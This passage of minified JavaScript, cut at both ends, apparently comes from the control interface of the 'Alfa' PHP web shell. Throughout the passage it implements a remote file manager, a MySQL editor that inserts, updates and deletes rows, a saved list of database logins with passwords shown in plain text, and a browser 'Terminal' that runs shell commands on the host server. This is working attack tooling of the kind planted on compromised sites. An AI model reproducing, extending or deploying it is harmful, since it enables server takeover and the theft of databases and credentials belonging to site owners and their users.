class='mysql-structure-qres'></div>",n+="</table><div style='padding-left: 384px;margin-top: 15px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlSearch(this);return false;'>Search</button></div>",e.pages>0){l+="<span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,1);'><<</span> <span> page: </span> <select tbl_name='"+t+"' db_target='"+a+"' name='mysql-q-pages' db_id='"+i+"' class='db-opt-id' onchange='alfaMysqlChangePage(this);' pages='"+e.pages+"'>";for(var b=1;b<e.pages+1;b++)l+="<option>"+b+"</option>";l+="</select><span> Of "+e.pages+"</span> <span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,2);'>>></span>"}var y=d.querySelector("#"+i);y.querySelector(".mysql-search-area").innerHTML=n,y.querySelector(".mysql-insert-row").innerHTML=r,y.querySelector(".mysql-edit-row").innerHTML="",y.querySelector(".mysql-structure").innerHTML=o,y.querySelector(".mysql-query-result-header .mysql-query-pager").innerHTML=l,y.querySelector(".mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:i,target:".mysql-query-result-content"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="none",alfaMysqlReportBuilder(i,e)}})}function alfaMysqlAlterTbl(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r=e.getAttribute("col_name"),o={};o.type=i.querySelector(".mysql-structure select[name=sel_"+r+"]").value,o.input=i.querySelector(".mysql-structure input[name=value_"+r+"]").value,alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_alter",db_info:{table:l,column:r,alter:o},post:{alfa2:"alter"}},function(e){var t=d.querySelector("#"+a+" .mysql-structure-qres");t.innerHTML=e,t.style.display="block"})}function alfaMysqlSearch(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r={};i.querySelectorAll(".mysql-search-area input, .mysql-search-area select").forEach(function(e){r.hasOwnProperty(e.name)||(r[e.name]={}),"SELECT"==e.tagName?r[e.name].opt=e.value:r[e.name].value=e.value}),alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_search_query",db_info:{table:l,search:r},post:{alfa2:"search"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaMysqlEditRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=(d.querySelector("#"+i),e.getAttribute("col_key")),r=e.getAttribute("key"),o=e.getAttribute("tbl_name"),n=e.getAttribute("row_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_table_edit_query",db_info:{table:o,col_key:l,key:r},post:{alfa2:t}},function(e){if(0!=e.length)if(e=JSON.parse(e),"edit"==t){var s="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>";for(var c in e){var u="";switch(e[c].type.tag){case"textarea":u="<textarea name='"+e[c].col+"' rows='5'>"+e[c].value+"</textarea>";break;case"input":u="<input type='"+e[c].type.type+"' name='"+e[c].col+"' value='"+e[c].value+"'>"}s+="<tr><th style='text-align: left;'>"+e[c].col+"</th><td>"+e[c].type.col_type+"</td><td>"+u+"</td></tr>"}s+="</table><div style='margin-left:20px;'><button col_key='"+l+"' key='"+r+"' tbl_name='"+o+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"edit\");return false;'>Update</button></div><div class='mysql-update-result'></div>",d.querySelector("#"+i+" .mysql-edit-row").innerHTML=s,alfaMysqlTabCtl({child:6,db_id:i,target:".mysql-edit-row"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="inline-block"}else"delete"==t&&(e.status?d.querySelector("#"+i+" .tbl_row_l"+n).remove():alert(e.error))})}function alfaMysqlTblSelectAll(e){var t=e.getAttribute("db_id");d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(t){t.checked=e.checked})}function alfaMysqlDeleteAllSelectedrows(e){var t=e.getAttribute("db_id"),a=e.getAttribute("db_target"),i=e.getAttribute("col_key"),l=e.getAttribute("tbl_name"),r=[];if(d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&r.push(e.value)}),0==r.length)return!1;alfaMysqlApi({db_id:t,db_target:a,ajax_id:"mysql_table_delete_all_query",db_info:{table:l,col_key:i,rows:r},post:{alfa2:"delete_all"}},function(e){if(""!=e)if((e=JSON.parse(e)).status){var a=0,i=d.querySelector("#"+t);d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&(a=e.getAttribute("row_id"),i.querySelector(".tbl_row_l"+a).remove())})}else alert(e.error)})}function alfaMysqlUpdateRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=d.querySelector("#"+i),r=".mysql-insert-row",o=".mysql-insert-result",n="mysql_table_insert_query",s="insert",c={table:e.getAttribute("tbl_name")};if("edit"==t){var u=e.getAttribute("col_key"),p=e.getAttribute("key");r=".mysql-edit-row",o=".mysql-update-result",n="mysql_table_update_query",s="update",c.col_key=u,c.key=p}var f={};l.querySelectorAll(r+" input, "+r+" textarea").forEach(function(e){f.hasOwnProperty(e.name)||(f[e.name]={}),f[e.name]=e.value}),c.data=f,alfaMysqlApi({db_id:i,db_target:a,ajax_id:n,db_info:c,post:{alfa2:s}},function(e){if(0!=e.length){e=JSON.parse(e);var t=d.querySelector("#"+i+" "+o);t.style.display="block",e.status?t.innerHTML="Success...":t.innerHTML=e.error}})}function alfaMysqlLoadDataType(e){e=e.toUpperCase();var t=["INT","VARCHAR","TEXT","DATE",{key:"Numeric",vals:["TINYINT","SMALLINT","MEDIUMINT","INT","BIGINT","-","DECIMAL","FLOAT","DOUBLE","REAL","-","BIT","BOOLEAN","SERIAL"]},{key:"Date and time",vals:["DATE","DATETIME","TIMESTAMP","TIME","YEAR"]},{key:"String",vals:["CHAR","VARCHAR","-","TINYTEXT","TEXT","MEDIUMTEXT","LONGTEXT","-","BINARY","VARBINARY","-","TINYBLOB","MEDIUMBLOB","BLOB","LONGBLOB","-","ENUM","SET"]},{key:"Spatial",vals:["GEOMETRY","POINT","LINESTRING","POLYGON","MULTIPOINT","MULTILINESTRING","MULTIPOLYGON","GEOMETRYCOLLECTION"]},{key:"JSON",vals:["JSON"]}],a="",i=!1;for(var l in t)if("object"==typeof t[l]){for(var r in a+='<optgroup label="'+t[l].key+'">',t[l].vals)a+="<option"+(t[l].vals[r]!=e||i?"":" selected")+">"+t[l].vals[r]+"</option>",t[l].vals[r]==e&&(i=!0);a+="</optgroup>"}else a+="<option"+(t[l]!=e||i?"":" selected")+">"+t[l]+"</option>",t[l]==e&&(i=!0);return a}function alfaMysqlChangePage(e,t){var a=e.getAttribute("db_id"),i=0;if(void 0!==t){e=d.querySelector("#"+a+" select[name=mysql-q-pages]");var l=parseInt(e.getAttribute("pages"));if(i=parseInt(e.value),1==t?--i:++i,0==i||l<i)return!1;e.value=i}else i=e.value;var r=e.getAttribute("db_target"),o=e.getAttribute("tbl_name");alfaMysqlApi({db_id:a,db_target:r,ajax_id:"mysql_table_change_page",db_info:{table:o,page:i},post:{alfa2:"page"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaRemoveCookie(e){document.cookie=e+"=;Max-Age=0; path=/;"}function alfaLogOut(){alfaRemoveCookie("AlfaUser"),alfaRemoveCookie("AlfaPass"),location.reload()}var alfaAlertBox=function(e,t){this.types={success:{class:"alert-success",icon:"http://solevisible.com/icons/menu/check-mark1.svg"},error:{class:"alert-error",icon:"http://solevisible.com/icons/menu/warning.svg"}},this.show=function(a){if(""===a||null==a)throw'"msg parameter is empty"';var i=document.querySelector(e),l=document.createElement("DIV"),r=document.createElement("DIV"),o=document.createElement("DIV"),n=document.createElement("A"),s=document.createElement("div"),c=document.createElement("IMG"),d=this;if(s.style.display="inline-block",s.style.marginRight="10px",r.style.display="inline-block",o.classList.add("alert-content"),o.innerText=a,n.classList.add("alert-close"),n.setAttribute("href","#"),l.classList.add("alert-box"),c.src=this.types[t.type].icon,c.style.width="30px",s.appendChild(c),l.appendChild(s),t.hasOwnProperty("title")){var u=document.createElement("DIV");u.classList.add("alert-content-title"),u.innerText=t.title,r.appendChild(u)}if(r.appendChild(o),l.appendChild(r),t.hideCloseButton&&void 0!==t.hideCloseButton||l.appendChild(n),t.hasOwnProperty("type")&&l.classList.add(this.types[t.type].class),i.appendChild(l),n.addEventListener("click",function(e){e.preventDefault(),d.hide(l)}),!t.persistent)var p=setTimeout(function(){d.hide(l),clearTimeout(p)},t.closeTime)},this.hide=function(e){e.classList.add("hide");var t=setTimeout(function(){e.parentNode.removeChild(e),clearTimeout(t)},500)}};function alfaShowNotification(e,t,a,i,l){void 0===a&&(a="success"),void 0===i&&(i=!1),void 0===l&&(l=1e4);var r={closeTime:l,persistent:i,type:a,hideCloseButton:!1};void 0!==t&&(r.title=t),new alfaAlertBox("#alert-area",r).show(e)}function alfaSyncMenuToOpt(e,t){var a="",i="",l=null;void 0!==t?(a="view_archive",i=e,l=location):(a=e.name,i=e.getAttribute("fname"),l=e),"extract"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=deziper",g("deziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="DeCompressor"):"compress"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=ziper",g("ziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="Compressor"):"view_archive"==a&&(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=archive_manager",g("archive_manager",null,"",c_+"/"+i,""),d.querySelector(".opt-title").innerHTML="Archive Manager")}function doFilterName(e){var t="#filesman_holder_"+alfa_current_fm_id;setTimeout(function(){var a=new RegExp(e.value,"i");d.querySelectorAll(t+" .fmanager-row").forEach(function(e){-1==e.querySelector(".main_name").getAttribute("fname").search(a)?e.style.display="none":e.style.display="table-row"})},100)}function sortBySelectedValue(e,t){setCookie(t,e.options[e.selectedIndex].value,2012),g("FilesMan",c_)}function loadPopUpDatabase(e,t,a){if(console.log(t),$("database_window").style.display="block",void 0===t){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}try{d.querySelector(".sql-tabs .sql-newtab").remove()}catch(e){}var i="id_db_"+getRandom(10);d.querySelector("#database_window .content_options_holder .sql-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="sql-content sql-active-content">'+e+"</div>"),d.querySelector("#database_window .content_options_holder .sql-tabs").insertAdjacentHTML("beforeend",'<div id="tab_'+i+'" opt_id="'+i+'" class="sql-tabname sql-active-tab" onclick="dbTabController(this);"><span style="font-weight:unset;">New DB Connection</span> <img opt_id="'+i+'" onclick="closeDatabase(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div><div class="sql-newtab" onclick="alfa_can_add_opt=true;g(\'sql\',null,\'\',\'\',\'\');" style="background-color:#800000;"><span style="font-weight:unset;">New Tab +</span></div>'),$(i).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",i)});try{$(i).querySelector(".getconfig").setAttribute("base_id",i)}catch(e){}return i}$(t).innerHTML=e;var l=$("tab_"+t);null!=l&&((-1==l.classList.value.indexOf("sql-active-tab")||database_window_is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","DB: "+l.innerText)),database_window_is_minimized&&alfaUpdateOptionsBadge("database_window")),void 0!==mysql_cache[t]&&mysql_cache[t].hasOwnProperty("db")&&mysql_cache[t].db.length>0&&"update"!=a&&(d.querySelector("#tab_"+t+">span").innerHTML=mysql_cache[t].db),$(t).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",t)});try{$(t).querySelector(".getconfig").setAttribute("base_id",t)}catch(e){}database_window_is_minimized||(d.body.style.overflow="hidden")}function loadPopUpOpTions(e,t){console.log(e),alfa_before_do_action_id="",$("options_window").style.display="block";var a=$("option_"+e);if(alfa_can_add_opt){alfa_can_add_opt=!1;try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var i="",l=$("menu_opt_"+e).innerHTML;"market"==e?l="Alfa Market":"GetDisFunc"==e&&(l="Disable Functions");try{d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}if(null!=a){var r=a.getAttribute("opt_count");null!=r?(i=parseInt(r)+1,a.setAttribute("opt_count",i)):(i=1,a.setAttribute("opt_count",i))}var o="option_"+e+i;d.querySelector("#options_window .content_options_holder .options_content").insertAdjacentHTML("afterbegin",'<div id="'+o+'" class="options_holder">'+t+"</div>"),d.querySelector("#options_window .content_options_holder .options_tab").insertAdjacentHTML("beforeend",'<div opt_id="'+o+'" onclick="optionsTabController(this);" title="'+l+'" id="tab_'+o+'" class="tab_name tab_is_active">'+l+' <img opt_id="'+o+'" onclick="closeOption(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),$(o).classList.toggle("option_is_active"),d.querySelectorAll("#"+o+" form, #"+o+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var l=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+i+'");'+l),t.setAttribute("opt_id",e+i)}else{l=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+i+'");'+l)}});try{$(o).querySelector(".getconfig").setAttribute("base_id",e+i)}catch(e){}return e+i}a.innerHTML=t;var n=$("tab_option_"+e);null!=n&&((-1==n.classList.value.indexOf("tab_is_active")||options_window_is_minimized)&&(n.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",n.innerText)),options_window_is_minimized&&alfaUpdateOptionsBadge("options_window")),d.querySelectorAll("#option_"+e+" form, #option_"+e+" a").forEach(function(t){var a=t.classList.value;if("getconfig"==a||"rejectme"==a)return!1;if("FORM"==t.tagName){var i=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+'");'+i),t.setAttribute("opt_id",e)}else{i=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+'");'+i)}});try{a.querySelector(".getconfig").setAttribute("base_id",e)}catch(e){}options_window_is_minimized||(d.body.style.overflow="hidden")}function alfaBeforeDoAction(e){alfa_before_do_action_id=e}function alfaLoaderOnTop(e){$("a_loader").style.display=e,d.body.style.overflow="block"==e?"hidden":"visible"}function alfaAjaxController(e){var t=e.getAttribute("parent");$("loader_"+t).remove(),"filesman_holder"==t.substr(0,15)&&($(t).style.minHeight="0"),_ALFA_AJAX_.hasOwnProperty(t)&&_ALFA_AJAX_[t].abort()}function closeDatabase(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("sql-active-tab"))if((e=d.querySelectorAll(".sql-tabs .sql-tabname")).length>1){e[0].classList.add("sql-active-tab");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("sql-active-content")}else editorClose("database_window");d.querySelector("div[opt_id="+a+"]").remove()}function closeFmTab(e,t){t.stopPropagation();var a=e.getAttribute("fm_id"),i=$("filesman_tab_"+a);if(-1!=i.classList.value.indexOf("filesman-tab-active")&&(e=d.querySelectorAll("#filesman_tabs .filesman_tab")).length>1){e[0].classList.add("filesman-tab-active");var l=e[0].getAttribute("fm_id"),r="filesman_holder_"+l;if(null!=$(r)){$(r).classList.toggle("filesman-active-content");var o=$("filesman_tab_"+l).getAttribute("path");initDir(o),d.mf.c.value=o,alfa_current_fm_id=l}}i.remove(),$("filesman_holder_"+a).remove(),alfaFilesmanTabHideTitle()}function closeOption(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("tab_is_active"))if((e=d.querySelectorAll(".options_tab .tab_name")).length>1){e[0].classList.add("tab_is_active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("option_is_active")}else editorClose("options_window");d.querySelector("div[opt_id="+a+"]").remove()}function historyPanelController(e){"hidden"==e.getAttribute("mode")?(d.querySelector(".editor-explorer").style.display="block",d.querySelector(".editor-modal").style.marginLeft="20%",e.setAttribute("mode","visible"),e.style.left="19%",e.innerHTML="<<"):(d.querySelector(".editor-explorer").style.display="none",d.querySelector(".editor-modal").style.marginLeft="1%",e.setAttribute("mode","hidden"),e.style.left="0%",e.innerHTML=">>")}function closeTerminalContent(e,t){t.stopPropagation();var a=e.getAttribute("term_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("active-terminal-tab"))&&(e=d.querySelectorAll(".terminal-tabs .terminal-tab")).length>1){e[0].classList.add("active-terminal-tab");var i=e[0].getAttribute("term_id");null!=$(i)&&$(i).classList.toggle("active-terminal-content")}d.querySelector("div[term_id="+a+"]").remove()}function closeEditorContent(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("editor-tab-active"))&&(e=d.querySelectorAll(".editor-tabs .editor-tab-name")).length>1){e[0].classList.add("editor-tab-active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("editor-content-active")}d.querySelector("div[opt_id="+a+"]").remove()}function optionsTabController(e){try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("option_is_active");try{d.querySelector("#options_window .content_options_holder .options_tab \t.tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("tab_is_active"),d.querySelector(".opt-title").innerHTML=e.getAttribute("title"),alfaUpdateOptionsBadge("options_window")}function terminalTabController(e){try{d.querySelector(".terminal-tab.active-terminal-tab").classList.remove("active-terminal-tab")}catch(e){}try{d.querySelector(".terminal-content.active-terminal-content").classList.remove("active-terminal-content")}catch(e){}var t=e.getAttribute("term_id");if(null==t)return!1;$(t).classList.toggle("active-terminal-content"),e.classList.remove("tab-is-done"),e.classList.add("active-terminal-tab"),$(t).querySelector(".php-terminal-input").focus(),alfaUpdateOptionsBadge("cgiloader")}function filesmanTabController(e){try{d.querySelector(".ajaxarea.filesman-active-content").classList.remove("filesman-active-content")}catch(e){}try{d.querySelector(".filesman_tab.filesman-tab-active").classList.remove("filesman-tab-active")}catch(e){}var t=e.getAttribute("fm_id");if(null==t)return!1;alfa_current_fm_id=t,e.classList.add("filesman-tab-active"),e.classList.remove("tab-is-done"),$("filesman_holder_"+t).classList.toggle("filesman-active-content");var a=e.getAttribute("path");initDir(a),d.mf.c.value=a}function dbTabController(e){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("sql-active-content"),e.classList.remove("tab-is-done"),e.classList.add("sql-active-tab"),alfaUpdateOptionsBadge("database_window")}function editorTabController(e,t){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}var a=null;void 0===t?a=e.getAttribute("opt_id"):(a=e,e=$("tab_"+a));var i=editor_files["file_"+a.replace("editor_source_","")];if(void 0!==i&&(d.querySelector(".editor-path").innerHTML=(i.pwd+"/"+i.file).replace(/\/\//g,"/")),null==a)return!1;$(a).classList.toggle("editor-content-active");try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("editor-tab-active"),alfaUpdateOptionsBadge("editor")}function alfaUpdateOptionsBadge(e){var t=d.querySelector("#"+e+"-minimized .options_min_badge");if(null!=t){var a=d.querySelectorAll("#"+e+" .tab-is-done").length;t.innerHTML=a,t.style.visibility=a>0?"visible":"hidden"}}function alfaOpenPhpTerminal(e){if(php_temrinal_using_cgi&&void 0===e)showEditor("cgiloader");else{$("cgiloader").style.display="block",$("cgiloader").style.background="rgba(0, 0, 0, 0.57)",$("cgiframe").style.background="rgba(0, 0, 0, 0.81)",$("cgiframe").style.border="1px solid rgb(30, 86, 115)",$("cgiframe").style.height="90%",$("cgiframe").style.padding="3px",d.querySelector("#cgiloader .opt-title").innerHTML="Terminal";var t="",a="",i="terminal_id_"+getRandom(10);void 0===e&&(t=" active-terminal-content",a=" active-terminal-tab"),d.querySelector("#cgiframe .terminal-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="terminal-content'+t+'"><div class="php-terminal-output"><div><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+'\',1);">+</button><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+"',0);\">-</button><input onchange=\"alfaTerminalChangecolor(this,'"+i+'\');" style="height: 18px;background: #dde2e2;" type="color"></div><pre class="ml1" style="border:unset;height: 90%;"></pre></div><div><form term_id="'+i+'" onSubmit="alfaExecTerminal(this);this.c.value=\'\';return false;" autocomplete="off" style="margin-top: 10px;"><div style="overflow: auto;white-space: nowrap;"><div style="display: inline-block;color:#4fbec3;margin-bottom:5px;margin-right:5px;">CWD:~# </div><div style="display: inline-block;color:#42ec42;" class="php-terminal-current-dir"></div></div><div style="position:relative;"><span style="color: #00ff08;font-size: 25px;">$ </span><input style="padding: 8px;font-size: 20px;width: 67%;border: 1px solid #27979B;padding-right:35px;" onkeyup="alfaWalkInTerminalHistory(this,event,\''+i+'\');" term_id="'+i+'" class="php-terminal-input" type="text" name="c" onfocus="closeHistoryCmd(\'free\',this);" placeholder="ls -la"><button class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;">ExeCute<button term_id="'+i+'" class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;" onClick="alfaExecTerminal(this, 1);return false;">Current Dir</button><div class="cmd-history-holder"><div class="commands-history-header">History</div><span onClick="clearTerminalHistory();" style="border-bottom: 1px solid;margin-bottom: 5px;display: inline-block;padding: 5px;color: #59de69;cursor: pointer;">Clear history</span><div style="overflow: auto;height: 82%;" class="commands-history"></div></div><div term_id="'+i+'" class="cmd-history-icon" mode="" onclick="closeHistoryCmd(this);"></div></form></div></div></div>');try{$("terminal_new_tab").remove()}catch(e){}d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="terminalTabController(this);" term_id="'+i+'" id="tab_'+i+'" class="terminal-tab'+a+'">Terminal <img term_id="'+i+'" onclick="closeTerminalContent(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="alfaOpenPhpTerminal(true);" id="terminal_new_tab" style="background-color:#800000;" class="terminal-tab">New Tab +</div>'),terminal_walk_index[i]={index:0,key:-1},d.querySelector("#"+i+" .php-terminal-input").focus(),d.querySelector("#"+i+" .php-terminal-current-dir").innerHTML=c_,d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Terminal",alfaTerminalSetColorAndSize(i),php_temrinal_using_cgi=!0;var l=alfaGetTerminalHistory();for(var r in l)d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+l[r]+"</div>")}d.body.style.overflow="hidden"}function alfaTerminalSetColorAndSize(e){var t=getCookie("alfa-terminal-color"),a=getCookie("alfa-terminal-fontsize");void 0!==t&&(d.querySelector("#"+e+" pre.ml1").style.color=t),void 0!==a&&(d.querySelector("#"+e+" pre.ml1").style.fontSize=a)}function alfaTerminalChangecolor(e,t){d.querySelector("#"+t+" pre.ml1").style.color=e.value,setCookie("alfa-terminal-color",e.value,2012)}function alfaGetTerminalHistory(e){var t=getCookie("alfa-terminal-history");try{t=atob(t),t=JSON.parse(t)}catch(e){t=[]}return void 0!==e&&t.reverse(),t}function changeTerminalFontSize(e,t){var a=d.querySelector("#"+e+" pre.ml1"),i=parseInt(window.getComputedStyle(a,null).getPropertyValue("font-size")),l="";1==t?(l=i+1+"px",a.style.fontSize=l):(l=i-1+"px",a.style.fontSize=l),setCookie("alfa-terminal-fontsize",l,2012)}function alfaWalkInTerminalHistory(e,t,a){var i=t||window.event;if("38"==i.keyCode||"40"==i.keyCode||"37"==i.keyCode||"39"==i.keyCode)switch(i.keyCode){case 38:var l=alfaGetTerminalHistory(!0),r="";0==terminal_walk_index[a].index?(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,void 0!==(r=l[terminal_walk_index[a].index])?(e.value=r,++terminal_walk_index[a].index):(e.value="",terminal_walk_index[a].index=0)):terminal_walk_index[a].index<l.length&&(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,e.value=l[terminal_walk_index[a].index],++terminal_walk_index[a].index),terminal_walk_index[a].key=1;break;case 40:l=alfaGetTerminalHistory(!0);if(terminal_walk_index[a].index>=0)0!=terminal_walk_index[a].index&&(--terminal_walk_index[a].index,1==terminal_walk_index[a].key&&--terminal_walk_index[a].index),void 0!==(r=l[terminal_walk_index[a].index])?e.value=r:(e.value="",terminal_walk_index[a].index=0);terminal_walk_index[a].key=0;break;default:console.log(i.keyCode)}else terminal_walk_index[a].index=0}function clearTerminalHistory(){d.querySelectorAll(".commands-history").forEach(function(e){e.innerHTML=""}),setCookie("alfa-terminal-history","",2012)}function alfaAceToFullscreen(e){var t=e.getAttribute("ace_id");alfa_ace_editors.editor[t].container.requestFullscreen()}function closeHistoryCmd(e,t){if("free"==e){var a=t.getAttribute("term_id");return e=d.querySelector("#"+a+" .cmd-history-icon"),d.querySelector("#"+a+" .cmd-history-holder").style.visibility="hidden",d.querySelector("#"+a+" .cmd-history-holder").style.opacity="0",e.setAttribute("mode","off"),!1}var i=e.getAttribute("mode"),l=(a=e.getAttribute("term_id"),d.querySelector("#"+a+" .cmd-history-holder"));0==i.length||"off"==i?(l.style.visibility="visible",l.style.opacity="1",e.setAttribute("mode","on")):(l.style.visibility="hidden",l.style.opacity="0",e.setAttribute("mode","off"))}function geEvalAceValue(e){var t=e.querySelector(".php-evals-ace").getAttribute("id");return alfa_ace_editors.eval[t].getValue()}function alfaOpenArchive(e){var t=e.getAttribute("path"),a=e.getAttribute("fname"),i=e.getAttribute("base_id");if(".."==a&&"phar://"!=t.substr(0,7))return!1;var l="a="+alfab64("open_archive_dir")+"&c="+alfab64(c_)+"&alfa1="+alfab64(t)+"&alfa2="+alfab64(i)+"&ajax="+alfab64("true");_Ajax(d.URL,l,function(e){if("0"!=e){$("archive_base_"+i).innerHTML=e;var a=$("archive_dir_"+i).getAttribute("archive_name"),l=$("archive_dir_"+i).getAttribute("archive_full"),r="",o="";if(0!=(t=t.split(a)[1]).length){var n=(t=t.split("/")).length-1;for(var s in 0==t[n].length&&t.splice(n,1),t)0!=t.length&&(o+=t[s]+"/",r+='<a base_id="'+i+'" fname="'+t[s]+'" path="'+l+o+'" onclick="alfaOpenArchive(this);">'+t[s]+"/</a>")}d.querySelector("#archive_dir_"+i+" .archive_pwd_holder").innerHTML=r}},!1,"open_archive_dir")}function alfaDeleteConnectToDb(e){d.querySelectorAll(".dbh_"+e).forEach(function(e){e.remove()}),alfaConnectionHistoryUpdate(e)}function alfaConnectToDb(e,t){var a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var i=d.querySelector("#"+t+" div.sf");i.querySelector("input[name=sql_host]").value=a[e].host,i.querySelector("input[name=sql_login]").value=a[e].user,i.querySelector("input[name=sql_pass]").value=a[e].pass,(i.querySelector("input[name=sql_base]")?i.querySelector("input[name=sql_base]"):i.querySelector("select[name=sql_base]")).value=a[e].db,i.querySelector("input[name=sql_count]").checked=!0,d.querySelector("#"+t+" div.sf .db-connect-btn").click()}function alfaShowConnectionHistory(e){var t={},a=e.getAttribute("db_id"),i=e.getAttribute("mode");if(rows='<table class="connection-hist-table"><tr><th>*</th><th>Host</th><th>User</th><th>Pass</th><th>Database</th><th>Connect</th><th>Delete</th></tr>',"on"==i){e.setAttribute("mode","off");try{t=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var l,r=1;for(l in t){var o=t[l].user+"_"+t[l].db;rows+='<tr class="dbh_'+o+'"><th>'+r+"</th><th>"+t[l].host+"</th><th>"+t[l].user+"</th><th>"+t[l].pass+"</th><th>"+t[l].db+'</th><th><button style="margin: unset;" class="connection-his-btn" onclick=\'alfaConnectToDb("'+o+'","'+a+'");\'>Connect</button></th><th style="text-align: center;"><button style="margin: unset;" class="connection-his-btn connection-delete" onclick=\'alfaDeleteConnectToDb("'+o+"\");'>X</button></th></tr>",r++}rows+="</table"}else e.setAttribute("mode","on"),rows="";d.querySelector("#"+a+" .connection_history_holder").innerHTML=rows}function alfaConnectionHistoryUpdate(e){var t,a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}for(t in mysql_cache)0!=mysql_cache[t].db.length&&(a[mysql_cache[t].user+"_"+mysql_cache[t].db]=mysql_cache[t]);void 0!==e&&delete 